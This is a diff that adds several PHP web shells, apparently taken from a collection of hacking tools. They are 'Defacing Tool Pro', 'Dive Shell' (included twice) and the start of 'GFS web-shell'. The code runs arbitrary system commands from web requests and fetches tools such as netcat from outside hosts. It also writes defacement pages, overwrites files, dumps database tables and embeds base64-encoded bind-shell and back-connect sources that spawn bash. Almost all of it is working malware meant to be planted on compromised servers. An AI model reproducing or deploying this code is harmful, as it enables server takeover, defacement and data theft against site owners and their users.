+if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+?>
+<body onload="focar();">
+<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
+.infop{font-family: verdana; font-size: 10px; color:#000000;}
+.infod{font-family: verdana; font-size: 10px; color:#414978;}
+.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
+.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
+<script>
+function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
+function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
+function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
+function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
+function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
+function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
+function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
+function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
+function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
+function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
+</script>
+<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
+<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
+<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
+</b></div></td></tr>
+<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
+<?php
+ $uname = @posix_uname();
+ while (list($info, $value) = each ($uname)) { ?>
+<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
+<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
+<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
+<? if($chdir!=getcwd()){?>
+<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
+<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
+</DIV></TD></TR></TABLE></td></tr>
+<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
+<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
+<td width="75"><DIV class="algod">command</DIV></td>
+<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
+<script>
+function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
+</script>
+</td></tr></table><table><tr><td>
+<?php
+ob_start();
+if(isset($chdir)) @chdir($chdir);
+function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
+function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
+function shell($what){echo(shell_exec($what));}
+function popenn($what){
+	$handle=popen("$what", "r");
+	$out=@fread($handle, 2096);
+	echo $out;
+	@pclose($handle);
+}
+function execc($what){
+	exec("$what",$array_out);
+	$out=implode("\n",$array_out);
+	echo $out;
+}
+function procc($what){
+	//na sequencia: stdin, stdout, sterr
+	if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
+	$process = @proc_open("$what",$descpec,$pipes);
+	if (is_resource($process)) {
+		fwrite($pipes[0], "");
+		fclose($pipes[0]);
+
+		while(!feof($pipes[2])) {
+			$erro_retorno = fgets($pipes[2], 4096);
+			if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
+		}
+    		fclose($pipes[2]);
+
+		while(!feof($pipes[1])) {
+			echo fgets($pipes[1], 4096);
+		}
+		fclose($pipes[1]);
+
+		$ok_p_fecha = @proc_close($process);
+	}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
+}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
+}
+
+$funE="function_exists";
+if($safe){$fe="safemode";$feshow=$fe;}
+elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
+elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
+elseif($funE('system')){$fe="system";$feshow=$fe;}
+elseif($funE('exec')){$fe="execc";$feshow="exec";}
+elseif($funE('popen')){$fe="popenn";$feshow="popen";}
+elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
+else {$fe="nofunction";$feshow=$fe;}
+if($fu!="0" or !empty($fu)){
+  if($fu==1){$fe="passthru";$feshow=$fe;}
+  if($fu==2){$fe="system";$feshow=$fe;}
+  if($fu==3){$fe="execc";$feshow="exec";}
+  if($fu==4){$fe="popenn";$feshow="popen";}
+  if($fu==5){$fe="shell";$feshow="shell_exec";}
+  if($fu==6){$fe="procc";$feshow="proc_open";}
+}
+$fe("$cmd 2>&1");
+$output=ob_get_contents();ob_end_clean();
+?>
+<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
+<option><?="using $feshow()";?>
+<option value="1">use passthru()
+<option value="2">use system()
+<option value="3">use exec()
+<option value="4">use popen()
+<option value="5">use shell_exec()
+<option value="6">use proc_open()*new
+<option value="0">auto detect (default)
+</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
+<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
+</tr></table></td></tr></table></form></td></tr>
+<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
+<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
+<?php
+echo $ch_msg;
+if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
+if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
+?></TEXTAREA><BR></td></tr>
+<?php
+if($list=="1") @include($remote_addr."flist".$format_addr);
+?>
+</table>
+

php/Dive Shell 1.0 - Emperor Hacking Team.php

@@ -0,0 +1,187 @@
+<?php
+
+/*Emperor Hacking TEAM */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>Dive Shell - Emperor Hacking Team</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #FFFFFF">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
+</font></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
+<div style="width: 989; height: 456">
+  <p align="center"><b>
+  <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
+  <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
+  </font>
+  &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea> </p>
+<p class="prompt" align="center">
+  <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
+<p class="prompt" align="center">
+  <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
+<p class="prompt" align="center">
+  <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
+&nbsp;</font></p>
+</div>
+</form>
+
+
+<p class="prompt" align="center">
+  <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
+  </b></p>
+
+
+
+</html>

php/Dive_Shell_1.0_Emperor_Hacking_Team.php

@@ -0,0 +1,187 @@
+<?php
+
+/*Emperor Hacking TEAM */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>Dive Shell - Emperor Hacking Team</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #FFFFFF">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
+</font></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
+<div style="width: 989; height: 456">
+  <p align="center"><b>
+  <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
+  <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
+  </font>
+  &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea> </p>
+<p class="prompt" align="center">
+  <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
+<p class="prompt" align="center">
+  <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
+<p class="prompt" align="center">
+  <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
+&nbsp;</font></p>
+</div>
+</form>
+
+
+<p class="prompt" align="center">
+  <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
+  </b></p>
+
+
+
+</html>

php/GFS web-shell ver 3.1.7 - PRiV8.php

@@ -0,0 +1,618 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ðåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèðîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
